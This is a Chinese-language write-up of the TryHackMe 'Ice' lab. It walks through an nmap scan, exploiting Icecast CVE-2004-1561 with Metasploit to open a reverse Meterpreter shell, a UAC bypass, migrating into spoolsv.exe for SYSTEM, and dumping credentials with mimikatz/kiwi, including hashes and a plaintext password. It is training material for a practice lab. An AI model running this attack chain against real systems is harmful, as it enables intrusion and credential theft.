免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务扫描
┌──(rootkali)-[~/tryhackme/ice]└─# nmap -sV -Pn 10.10.121.62 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 ESTStats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service ScanService scan Timing: About 50.00% done; ETC: 00:44 (0:00:19 remaining)Nmap scan report for 10.10.121.62Host is up (0.30s latency).Not shown: 988 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)3389/tcp open ssl/ms-wbt-server?5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)8000/tcp open http Icecast streaming media server49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49158/tcp open msrpc Microsoft Windows RPC49159/tcp open msrpc Microsoft Windows RPC49160/tcp open msrpc Microsoft Windows RPCService Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows看到开了很多端口,咱们注意8000端口这个服务,在CVE Details显示存在一个Execute CodeOverflow破绽,CVE编号为:CVE-2004-1561
在msf上搜寻这个编号的破绽利用模块:
msf6 > search CVE-2004-1561Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header OverwriteInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header初始shell
设置参数,开始攻打,顺利拿到初始shell
msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62rhosts => 10.10.121.62msf6 exploit(windows/http/icecast_header) > set lhost tun0lhost => tun0msf6 exploit(windows/http/icecast_header) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (175174 bytes) to 10.10.121.62[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500meterpreter > shellProcess 356 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoamiwhoamidark-pc\dark应用post/multi/recon/local_exploit_suggester枚举提权模块
meterpreter > run post/multi/recon/local_exploit_suggester[*] 10.10.121.62 - Collecting local exploits for x86/windows...[*] 10.10.121.62 - 37 exploit checks are being tried...[+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.nil versions are discouraged and will be deprecated in Rubygems 4[+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.[+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.咱们抉择exploit/windows/local/bypassuac_eventvwr这个提权模块,设置参数,进行提权
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/bypassuac_eventvwr) > optionsModule options (exploit/windows/local/bypassuac_eventvwr): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on.Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.3.67 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Windows x86msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1session => 1msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0lhost => tun0msf6 exploit(windows/local/bypassuac_eventvwr) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] UAC is Enabled, checking level...[+] Part of Administrators group! Continuing...[+] UAC is set to Default[+] BypassUAC can bypass this setting, continuing...[*] Configuring payload and stager registry keys ...[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.[*] Sending stage (175174 bytes) to 10.10.121.62[*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500[*] Cleaning up registry keys ...meterpreter > shellProcess 356 created.Channel 1 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoamiwhoamidark-pc\darkmeterpreter > getprivsEnabled Process Privileges==========================Name----SeBackupPrivilegeSeChangeNotifyPrivilegeSeCreateGlobalPrivilegeSeCreatePagefilePrivilegeSeCreateSymbolicLinkPrivilegeSeDebugPrivilegeSeImpersonatePrivilegeSeIncreaseBasePriorityPrivilegeSeIncreaseQuotaPrivilegeSeIncreaseWorkingSetPrivilegeSeLoadDriverPrivilegeSeManageVolumePrivilegeSeProfileSingleProcessPrivilegeSeRemoteShutdownPrivilegeSeRestorePrivilegeSeSecurityPrivilegeSeShutdownPrivilegeSeSystemEnvironmentPrivilegeSeSystemProfilePrivilegeSeSystemtimePrivilegeSeTakeOwnershipPrivilegeSeTimeZonePrivilegeSeUndockPrivilege提权
咱们的权限账号仍然是dark-pc\dark,然而用getprivs命令查看,显示当初曾经领有了SeTakeOwnershipPrivilege的权限
用PS命令列出目前靶机所有过程:
meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1056 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1136 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1224 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe 1264 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1328 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1408 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe 1516 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 1528 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe 1548 1508 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe 1712 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe 1720 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe 1752 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1804 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe 1892 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe 2108 2300 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe 2124 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 2284 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe 2300 1548 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe 2352 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe 2460 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe 2528 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe 2536 2092 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe 2916 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe注意这个过程:
1264 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe这个过程与以后过程同样是x64架构。咱们用migrate -N把过程迁徙到这个过程当中,胜利降级到零碎最高权限。
meterpreter > migrate -N spoolsv.exe[*] Migrating from 2536 to 1264...[*] Migration completed successfully.meterpreter > getuidServer username: NT AUTHORITY\SYSTEM获取其余用户凭证
应用load kiwi命令收集零碎里其余用户的凭证信息
meterpreter > load kiwiLoading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/Success.应用命令help查看反对的kiwi指令:
Kiwi Commands============= Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerberos Retrieve Kerberos creds (parsed) creds_livessp Retrieve Live SSP creds creds_msv Retrieve LM/NTLM creds (parsed) creds_ssp Retrieve SSP creds creds_tspkg Retrieve TsPkg creds (parsed) creds_wdigest Retrieve WDigest creds (parsed) dcsync Retrieve user account information via DCSync (unparsed) dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync golden_ticket_create Create a golden kerberos ticket kerberos_ticket_list List all kerberos tickets (unparsed) kerberos_ticket_purge Purge any in-use kerberos tickets kerberos_ticket_use Use a kerberos ticket kiwi_cmd Execute an arbitary mimikatz command (unparsed) lsa_dump_sam Dump LSA SAM (unparsed) lsa_dump_secrets Dump LSA secrets (unparsed) password_change Change the password/hash of a user wifi_list List wifi profiles/creds for the current user wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)应用creds_all命令打印出所有用户凭证:
meterpreter > creds_all[+] Running as SYSTEM[*] Retrieving all credentialsmsv credentials===============Username Domain LM NTLM SHA1-------- ------ -- ---- ----Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0ebwdigest credentials===================Username Domain Password-------- ------ --------(null) (null) (null)DARK-PC$ WORKGROUP (null)Dark Dark-PC Password01!tspkg credentials=================Username Domain Password-------- ------ --------Dark Dark-PC Password01!kerberos credentials====================Username Domain Password-------- ------ --------(null) (null) (null)Dark Dark-PC Password01!dark-pc$ WORKGROUP (null)咱们看到dark的登录明码是:Password01!